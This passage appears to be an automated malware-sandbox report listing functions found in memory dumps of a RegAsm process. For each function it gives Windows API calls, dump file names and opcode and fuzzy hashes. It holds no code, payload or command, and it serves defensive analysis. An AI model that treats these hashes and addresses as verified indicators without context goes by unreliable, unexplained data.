String ID:
API String ID: 716092398-0
Opcode ID: 6b6020821a0598593f8949a8c13f15671362534adfbc57f70d2f49c6a67fd5c0
Instruction ID: cc6de3ccf469f2d14e734ac4dec1c5fdd4625d2e73ae8727273912d6c88f3ee2
Opcode Fuzzy Hash: 6b6020821a0598593f8949a8c13f15671362534adfbc57f70d2f49c6a67fd5c0
Instruction Fuzzy Hash: B551D2B1D00349EFDB14CF99C984ADEBBB5BF48310F24852AE819AB250D775A895CF90

Function 05161CE4 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05161E02

Memory Dump Source

Source File: 0000000C.00000002.2271725394.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5160000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 678de4283015537f222677e94a401f5c12eff2108cbf33aa9047b2e5744df7ab
Instruction ID: ff424659d593ed7b420f21052e849b3f754fed83c9aefe59268f83689ded3095
Opcode Fuzzy Hash: 678de4283015537f222677e94a401f5c12eff2108cbf33aa9047b2e5744df7ab
Instruction Fuzzy Hash: 1451F2B1D00309EFDB14CF99C884ADEBBB5FF48310F24812AE818AB210D770A895CF90

Function 02A95935 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02A959F1

Memory Dump Source

Source File: 0000000C.00000002.2214365169.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a90000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: bdb21c8dc081240be2a891f98256d0d13d85fcc300e7e75409cb7d4b75f86389
Instruction ID: 19d2709a937754d4a311d03286e4bb8eccd906bf8048021fdc83c57f83d45887
Opcode Fuzzy Hash: bdb21c8dc081240be2a891f98256d0d13d85fcc300e7e75409cb7d4b75f86389
Instruction Fuzzy Hash: B941B0B0D00719CFDB15CFAAC88879EBBF5BF45304F60846AD408AB251DB755949CF54

Function 05160BFC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05164381

Memory Dump Source

Source File: 0000000C.00000002.2271725394.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5160000_RegAsm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 0d8ff84e735fa98c63ccfb16faa9d6fe3deb4490954688d64a7b0dabecd59363
Instruction ID: 9ab05cbf7a1d2e70dfe1fa6a0e598dd8294a35a4bd64d4720733dae3bb00b6f1
Opcode Fuzzy Hash: 0d8ff84e735fa98c63ccfb16faa9d6fe3deb4490954688d64a7b0dabecd59363
Instruction Fuzzy Hash: 044128B49003058FDB14CF99C888AAEBBF5FF88314F258459D519AB361D774A841CBA0

Function 02A94248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02A959F1

Memory Dump Source

Source File: 0000000C.00000002.2214365169.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a90000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fa9ddf3b845bd9dab644397649d06624ca0d02546ad36520c95e09b14fba3741
Instruction ID: 7c7a4e6b9db9d47cc8a84950208ba9e5fb98dda302211b8fa87c57d548f10f6a
Opcode Fuzzy Hash: fa9ddf3b845bd9dab644397649d06624ca0d02546ad36520c95e09b14fba3741
Instruction Fuzzy Hash: 8341CFB0C00719CFDB25CFAAC884B9EBBF5BF45714F60806AD408AB251DB756949CF94

Function 06873D7A Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 06873E50

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6840cd3fcca481785e14d8e88bd75423e89d027f5e0728ad08ba8a605d016056
Instruction ID: b268ab0c034031001363ae055ed0d75b44dc0100e5e27d041ec020e47dc49690
Opcode Fuzzy Hash: 6840cd3fcca481785e14d8e88bd75423e89d027f5e0728ad08ba8a605d016056
Instruction Fuzzy Hash: 14319074E012089FDB04EFA5D494AEEBBB2FF48300F20842AD516AB258DB359D46DF90

Function 02A9C9A0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9D2C6,?,?,?,?,?), ref: 02A9D387

Memory Dump Source

Source File: 0000000C.00000002.2214365169.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a90000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 41707954397aeac7416af20dcf0b3b03e1063692cace2fd303dbfaceed6401f9
Instruction ID: bdc18878acb411b31af5330effa65ee4e4fd48875dfeddf5adefb18e61215a71
Opcode Fuzzy Hash: 41707954397aeac7416af20dcf0b3b03e1063692cace2fd303dbfaceed6401f9
Instruction Fuzzy Hash: 752114B5900309EFDB10CF9AD984ADEFBF4EB48320F14845AE918A3350D774A950CFA4

Function 02A9D2FF Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9D2C6,?,?,?,?,?), ref: 02A9D387

Memory Dump Source

Source File: 0000000C.00000002.2214365169.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a90000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9f6b597685078ae6ca4a3d319ff9ad6a51211fe95f9f720d9c9e6145c33ffa1b
Instruction ID: 0b51358f312938bae76d4fa1b7d4ec78ad037e4763c14bae3f80b94d02879426
Opcode Fuzzy Hash: 9f6b597685078ae6ca4a3d319ff9ad6a51211fe95f9f720d9c9e6145c33ffa1b
Instruction Fuzzy Hash: 6421D3B5D00249DFDB10CFAAD984ADEBBF4EB48320F14845AE918B7350D378A954CFA0

Function 068708D0 Relevance: 1.5, APIs: 1, Instructions: 49
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 06873C85

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 37c050c6fd392b2f8c7d3075be539af9debd621ab4e5a787bcd04cc2b417290f
Instruction ID: 37a38e915076aa531998fb579930589cbc6fab6de40ffe8677fd62e3d8856af8
Opcode Fuzzy Hash: 37c050c6fd392b2f8c7d3075be539af9debd621ab4e5a787bcd04cc2b417290f
Instruction Fuzzy Hash: 111146B1804348CFDB50CF99D589BDEBBF4EB58224F14885AD508A7340D378A544CBA6

Function 02A9B020 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02A9B086

Memory Dump Source

Source File: 0000000C.00000002.2214365169.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a90000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e929772c5d6ae2575a357e6593b1c1feef6acf7267105c4bb1a55302ec1b1672
Instruction ID: 3cacad3e1261109a0936dea1d05f49b4e7b9bab5f6c13099f1c78bce2cd845d9
Opcode Fuzzy Hash: e929772c5d6ae2575a357e6593b1c1feef6acf7267105c4bb1a55302ec1b1672
Instruction Fuzzy Hash: 411113B5C007498FDB10CF9AD544BDEFBF4AB48224F10846AD428B7610D775A545CFA1

Function 06873C28 Relevance: 1.5, APIs: 1, Instructions: 47
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 06873C85

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 8ea7541bc3aab56889466f28058158e0a941513af8af95f2b6c83a990ca21542
Instruction ID: 0379e21c3fe144513ba602eee51867d245120e085b187d4935cb7a8671d0ddb5
Opcode Fuzzy Hash: 8ea7541bc3aab56889466f28058158e0a941513af8af95f2b6c83a990ca21542
Instruction Fuzzy Hash: D11122B58003498FDB10CF9AD548BDEFBF4EB88324F208459D558A7200D378A944CFA5

Function 089DA128 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 089DAD75

Memory Dump Source

Source File: 0000000C.00000002.2306508641.00000000089D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_89d0000_RegAsm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9364c034c8a2217e51bd82ec5c44f2895d5b77bdfc3571c2d2cef50cd42fa8ca
Instruction ID: 86a07cdb0d9c7c0f5f445c4411f23b79ca6427d9e52cf9963859e3d708dfef9a
Opcode Fuzzy Hash: 9364c034c8a2217e51bd82ec5c44f2895d5b77bdfc3571c2d2cef50cd42fa8ca
Instruction Fuzzy Hash: B31125B58003499FDB10DF9AC484BDEBBF8EB48321F10881AE918A3640C375A954CFA4

Function 068708DC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06873C85

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 52b5a9b83db7c04d956e9b68b8657c021a5800ea6c24097cfde86b51f90353bd
Instruction ID: 4fc7cc23028dd984f1f59a5618161d98dbebfb72f2deaebeebec7463f09aa6b2
Opcode Fuzzy Hash: 52b5a9b83db7c04d956e9b68b8657c021a5800ea6c24097cfde86b51f90353bd
Instruction Fuzzy Hash: 4A1133B58007599FDB60CF9AD548BDEBBF4EB48224F108859D518A3300D378A944CFA6

Function 02A9B01F Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02A9B086

Memory Dump Source

Source File: 0000000C.00000002.2214365169.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a90000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6658f5e67b7485cc5c9b6b0a878d6fedc4973ccaaa057158a9f524d34b5bf5aa
Instruction ID: 3ff595e27064fe3c8eb15e43a9df1d70551ce43cc09565953065e5f5762373e6
Opcode Fuzzy Hash: 6658f5e67b7485cc5c9b6b0a878d6fedc4973ccaaa057158a9f524d34b5bf5aa
Instruction Fuzzy Hash: C0110FB6C007498FDB10CF9AD544BDEFBF4AB48228F14886AC428B7610D379A545CFA0

Function 089DAD12 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 089DAD75

Memory Dump Source

Source File: 0000000C.00000002.2306508641.00000000089D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_89d0000_RegAsm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b42bc63849b9c9d5113a6cd932fff34b6089f8cc71bb4d024bd9798460a4685a
Instruction ID: 0b956fabf5b2f570bb602ee4b7aa93f4cf33e7e225ffbc59d90e39af52fe8862
Opcode Fuzzy Hash: b42bc63849b9c9d5113a6cd932fff34b6089f8cc71bb4d024bd9798460a4685a
Instruction Fuzzy Hash: 861122B58003499FDB10CF9AC984BEEBBF4EB48324F10881AE458A3640C378A954CFA0

Function 02A9D2FA Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9D2C6,?,?,?,?,?), ref: 02A9D387

Memory Dump Source

Source File: 0000000C.00000002.2214365169.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a90000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ec0bff6595389e87254b6fd6ccc9d819989cca590c7efa2e9c31e6c8415be530
Instruction ID: fda377952eea30d852dc0f26e3bea4aa1464afba735fa854f148ecf11f1d55d4
Opcode Fuzzy Hash: ec0bff6595389e87254b6fd6ccc9d819989cca590c7efa2e9c31e6c8415be530
Instruction Fuzzy Hash: 1311697590024ADFDF10CFA9E884BDEBFF0AF49324F24819AE514A7250C374A891CB61

Function 065B59C8 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

d, xrefs: 065B5C29

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: e21e4060af6cddb9fb9b3555b3b9d89da174ab11a46fbff7e2c295687b30ed75
Instruction ID: 5b20f34f21e79a36232135e9f7a539f5459b0451a5976f41204922bc63c3c068
Opcode Fuzzy Hash: e21e4060af6cddb9fb9b3555b3b9d89da174ab11a46fbff7e2c295687b30ed75
Instruction Fuzzy Hash: CEC16B34600602CFC768CF18C4809AABBF2FF89314B65CA59D55A9B661EB30FD46CF94

Function 06591BA0 Relevance: 1.4, Instructions: 1441COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0ba4829216e05a58aabb7847d3388c8119520124d7297ef69b601dc1c203c3
Instruction ID: 78610940dcaee9cf5137dde12dad39ef49139cf432c52d60234a8ad2957adb3d
Opcode Fuzzy Hash: 6c0ba4829216e05a58aabb7847d3388c8119520124d7297ef69b601dc1c203c3
Instruction Fuzzy Hash: B0C23A30B102189FDB55DF64C890BADB7B2FF88700F11849AE60AAB3A1DB719E45CF51

Function 06593838 Relevance: .8, Instructions: 778COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a00c61795eb52e955d6066205242f0a16987481ac68e4154010da76fe195e22
Instruction ID: 194ab963fc003247fa43ee4e06a4f78cd581ff804a38938c37e9068707ccfd5c
Opcode Fuzzy Hash: 5a00c61795eb52e955d6066205242f0a16987481ac68e4154010da76fe195e22
Instruction Fuzzy Hash: 00621534B002049FDB44DF68C994EAABBF6FF89704F15809AE506DB3A5DA71ED41CB60

Function 065900D8 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452da35e41b68129b7890bedcb337c292b47d7fe8e288c8e3e4a400728ac9ece
Instruction ID: ecb9faaf9cc269bfaed646f9ffb98500cf22ead92a0b9cee9d0926cafce9d998
Opcode Fuzzy Hash: 452da35e41b68129b7890bedcb337c292b47d7fe8e288c8e3e4a400728ac9ece
Instruction Fuzzy Hash: CA4267307007148FDB65AFB4D89066EB7B2BFCA614B41491CD503AF391CBBAED058B96

Function 06590D80 Relevance: .6, Instructions: 618COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b582a9e837d1e5fc1c90dfd7e8538f410403e5f5976df5d29d8acdedd5d2abd
Instruction ID: 102a5dbfcf5c4e8291fc756bb941ade19c920f960998c3bf065ad0ca8e1aca03
Opcode Fuzzy Hash: 0b582a9e837d1e5fc1c90dfd7e8538f410403e5f5976df5d29d8acdedd5d2abd
Instruction Fuzzy Hash: 4D22BF34B006169FEF55DFA5C844A6EBBF6FF89200B15885AE506DB3A6CB70DC01CB61

Function 065B48A8 Relevance: .5, Instructions: 511COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a597d3f83244bde7b6bd7afc6c11098505a121c949b948e9738f02411f253682
Instruction ID: 2b2a726c430396930ffac70c9554ee41a2450266b87d32420baf79ade0fccb8d
Opcode Fuzzy Hash: a597d3f83244bde7b6bd7afc6c11098505a121c949b948e9738f02411f253682
Instruction Fuzzy Hash: 07123734B006058FDB64DF29C884AAABBF2FF89300B1594A9E546CB366DB30EC45CF51

Function 06590597 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cecebdf9f8e5558f2ac64ad04cd7ed45363e4e1d6b003e9ac1bc9dd45b6f1f20
Instruction ID: e03e03cae6e2cdc1125ae00fd9a3af695333deaee42aaadb327279ddd11e39cf
Opcode Fuzzy Hash: cecebdf9f8e5558f2ac64ad04cd7ed45363e4e1d6b003e9ac1bc9dd45b6f1f20
Instruction Fuzzy Hash: 4B0298347003008FEB549B64D894B6E77B2FF8A704F41485DEA029F791CBB9ED458BA6

Function 0659060F Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d70d1402d16646362089e6061b35375f2c044c7f330d4382575db5472e0568d
Instruction ID: 915fd5d58d0d39878811592bb234805504b630f6c92d5fd33c192111b3d28d57
Opcode Fuzzy Hash: 6d70d1402d16646362089e6061b35375f2c044c7f330d4382575db5472e0568d
Instruction Fuzzy Hash: 11027734B003008FEB549B64D894B6E77B6FF8A704F01485DEA029F791CBB9ED458BA1

Function 065B3F50 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 374e70c77113606819375d1a3d006bbc6c49d0a1ade594d30d178d125730ef53
Instruction ID: 57758de4a2611192d55a4cfec92e177e2208b74efc1cd20cc1c7477172257727
Opcode Fuzzy Hash: 374e70c77113606819375d1a3d006bbc6c49d0a1ade594d30d178d125730ef53
Instruction Fuzzy Hash: 0FE12D34F006158FDB64DF69C994AAEB7F6BF88700B149169D906EB356DB70DC01CBA0

Function 06590687 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a7507553eff8f471e8bf21526737cfc3c6210e9a6716c2bb34a37137063beee
Instruction ID: 61aebaf0c6f9e3159c8371a154585f1b6748fb8271b4974e71ee4e63aaef423d
Opcode Fuzzy Hash: 9a7507553eff8f471e8bf21526737cfc3c6210e9a6716c2bb34a37137063beee
Instruction Fuzzy Hash: 2EE16A34B003008FEB549B64C894B6D77B6FF8A704F054859EA069F7A1CBB9DD45CBA1

Function 065BE587 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18795b29e8620d5fdfc3fa97555c229d55284ffa156a926987105939f31f8c7f
Instruction ID: 2e3cfd8ac067af11f0c419f7ee715d006ce56410d075b66824aa7e9bbdd53dbd
Opcode Fuzzy Hash: 18795b29e8620d5fdfc3fa97555c229d55284ffa156a926987105939f31f8c7f
Instruction Fuzzy Hash: F4D1BE30310700ABE309FBB0DC92A7DBB97BB89715B88842895094F7A5DF726D1953D7

Function 065BE598 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68477186a2fe1338f9b87d0af69ea32a90a49947877efed3e49648fd8e7848eb
Instruction ID: c07874141119ba9a68872164a50cb8bcc990d493c2f3a5c6b43fb053871d02bb
Opcode Fuzzy Hash: 68477186a2fe1338f9b87d0af69ea32a90a49947877efed3e49648fd8e7848eb
Instruction Fuzzy Hash: A7D1AE30310700ABE309EBB0DC92A7DBB97BB89715B88842895094F7A5DF726D1953D7

Function 06591B84 Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9963616381b6a8ae6fcd393eb94a8815836ad37c38307334776c75c99ef17023
Instruction ID: 4a57f0d07f74430493f0f3a2f826267110aefc9ad44ad6aaeabdea16b0576dc8
Opcode Fuzzy Hash: 9963616381b6a8ae6fcd393eb94a8815836ad37c38307334776c75c99ef17023
Instruction Fuzzy Hash: 04D15534B10100AFCB54DF98D890E9D77B6FF88704B558059EA0AEB7A1CBB1ED49CB61

Function 065906FF Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f223fd0f8921099f36b94d800b3e23a8a1790533a32a4ca233a6403bb2e7860
Instruction ID: 3b4406c7896c00d427185d1218ba6fe4c234657ff77735ccea7db5d4202b6c51
Opcode Fuzzy Hash: 3f223fd0f8921099f36b94d800b3e23a8a1790533a32a4ca233a6403bb2e7860
Instruction Fuzzy Hash: EDD16C34B103008FEF449B64C894B6D77B6FF8A704F058859EA069B7A1CBB9DD45CBA1

Function 065900B8 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81e10734b62814349629009653f8116f1de1d7f415028952345881db3eb8c445
Instruction ID: 4940655155e4399dd6e0e32efff21af3d479cdeb82c21d0661c9ea5b40d898dc
Opcode Fuzzy Hash: 81e10734b62814349629009653f8116f1de1d7f415028952345881db3eb8c445
Instruction Fuzzy Hash: F2C17D34B002008FEF449B64C898B6D77B6FF8A704F05885AEA06DB3A1CB75DD41CBA1

Function 06591582 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cbbf228282f42ae557b39530c4ea63d715c344a26fb0fd80a87ce4437d0465e
Instruction ID: 284d872e2237b920d777e4619e84c2d54d26000751efe2a887e0a4559133905f
Opcode Fuzzy Hash: 7cbbf228282f42ae557b39530c4ea63d715c344a26fb0fd80a87ce4437d0465e
Instruction Fuzzy Hash: 52C1C234B006128FEB649BA5C894B6E77E6BF89300F15885AE503CB3A1DF75DC45CBA1

Function 065B8C88 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 990dde0d163d27351a4924a255aa97a50328867005cca55c53585518a635bad3
Instruction ID: 697d431fa0148b8f1f0a2f10d5cf03dcc3d05b560e5d6f86ebecb3d3f48f4cef
Opcode Fuzzy Hash: 990dde0d163d27351a4924a255aa97a50328867005cca55c53585518a635bad3
Instruction Fuzzy Hash: F341F730B08255AFDB499F7498147AF3B6AEFC5391F14405AE409AB384DE388C51D7E6

Function 065B7D58 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96694fbf94dc13da301154064f41dab4d9fcf5bdbc779c23e0f14e84cde63838
Instruction ID: 3348a1ae8ef75332b3285ffc6e7bd845997a53652bb7032a32bfe32f1e5a569b
Opcode Fuzzy Hash: 96694fbf94dc13da301154064f41dab4d9fcf5bdbc779c23e0f14e84cde63838
Instruction Fuzzy Hash: 01513371E00219DFDB54CFA9C884BDEBBF2BF88310F14842AE415AB284DB749945CF90

Function 065934D8 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2285967786.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6590000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96410c6408a893890f1c8798dd5f86739bcae45c8533aad8c1420aba7821f79e
Instruction ID: 18baa0a1113366dd4618a3ecf3315a5069892b8f04fb8cf98bf42115f316dbb5
Opcode Fuzzy Hash: 96410c6408a893890f1c8798dd5f86739bcae45c8533aad8c1420aba7821f79e
Instruction Fuzzy Hash: 4B513935B106049FCB44DF69C88499ABBF2FF8D310B1580A9E909AB361EB30EC05CB60
